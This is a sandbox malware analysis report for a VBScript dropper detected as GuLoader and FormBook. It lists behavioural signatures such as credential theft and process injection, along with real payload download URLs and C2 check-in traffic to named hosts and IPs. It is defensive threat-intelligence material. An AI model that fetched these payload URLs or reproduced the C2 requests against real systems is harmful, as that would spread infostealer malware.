Windows Analysis Report
FTG_PD_04024024001.vbs

Overview

General Information

Sample name:	FTG_PD_04024024001.vbs
Analysis ID:	1431505
MD5:	0d167ef616c14b868472f78d1195fdf3
SHA1:	d203ebbb35564dd406590d84b4c73cf310104634
SHA256:	6c4ed597f8ac1bf79f88afe6704c467c3629247824efb12ab35a72fd52176e84
Tags:	GuloaderHUNvbs
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.oyoing.com	Virustotal: Detection: 9%	Perma Link
Source: www.tyaer.com	Virustotal: Detection: 10%	Perma Link
Source: http://87.121.105.163	Virustotal: Detection: 18%	Perma Link
Source: http://87.121.105.163/	Virustotal: Detection: 18%	Perma Link

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb(g source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2482681439.0000000007984000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2470735399.0000000003368000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5v source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5V source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdb source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2486548561.0000000008A20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\AtBroker.exe

Code function: 11_2_02CED1C0 FindFirstFileW,FindNextFileW,FindClose,

11_2_02CED1C0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then mov esp, ebp	10_2_01142198
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop edi	10_2_011423C8
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop edi	10_2_011435F8
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then mov esp, ebp	10_2_01142191
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop edi	10_2_011548A4
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop edi	10_2_01143228
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then mov esp, ebp	10_2_01142271
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then xor eax, eax	10_2_01149418
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop ebx	10_2_01151647
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 4x nop then pop ebx	10_2_01151648
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then pop ebx	11_2_02CE3070
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then xor eax, eax	11_2_02CDAE40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then pop ebx	11_2_02CE306F

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49717 -> 47.91.88.207:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View	IP Address: 47.91.88.207 47.91.88.207

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163

Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe

Code function: 10_2_011435F8 getaddrinfo,setsockopt,recv,recv,

10_2_011435F8

Source: global traffic	HTTP traffic detected: GET /Stereotyperingens72.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /EYioOXUtWs45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gnbc/?TjZX=EdG8rNSX_ZztGDlp&fLe=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: www.tyaer.com
Source: global traffic	DNS traffic detected: DNS query: www.oyoing.com
Source: global traffic	DNS traffic detected: DNS query: www.megabet303.lol

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Apr 2024 09:04:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B10BE8A762AE81CED627A4E1A7A9358CAAB5846793A1442B0047BEFEB01Set-Cookie: _csrf=9b895372084a89fe8c8a5bba3c43db46315c9bdef088af03cbbed36579c8d55ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%220HbANrynv9OLPgrRc6bwtTZQ9wGPFTw0%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 78 5a 57 78 44 37 4e 6b 77 79 69 38 74 71 59 67 4b 79 4c 42 77 49 42 77 6d 78 73 4c 7a 53 6f 31 41 38 5f 56 62 72 50 5f 47 77 48 31 33 64 4e 4f 5f 52 61 36 52 73 71 50 36 57 78 37 52 62 4f 53 34 30 62 35 62 48 2d 5a 63 47 51 36 75 4a 49 2d 39 61 74 73 4d 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="

Source: powershell.exe, 00000002.00000002.2624324723.000001CB00223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2624324723.000001CB01E84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163
Source: wab.exe, 00000008.00000003.2709804128.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2806420134.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2709595724.0000000006A39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/
Source: wab.exe, 00000008.00000002.2806244411.00000000069E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/EYioOXUtWs45.bin
Source: wab.exe, 00000008.00000002.2806244411.00000000069E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/EYioOXUtWs45.binM
Source: powershell.exe, 00000002.00000002.2624324723.000001CB00223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Stereotyperingens72.xsnP
Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Stereotyperingens72.xsnXRyl4
Source: powershell.exe, 00000002.00000002.2624324723.000001CB02036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.Hb
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
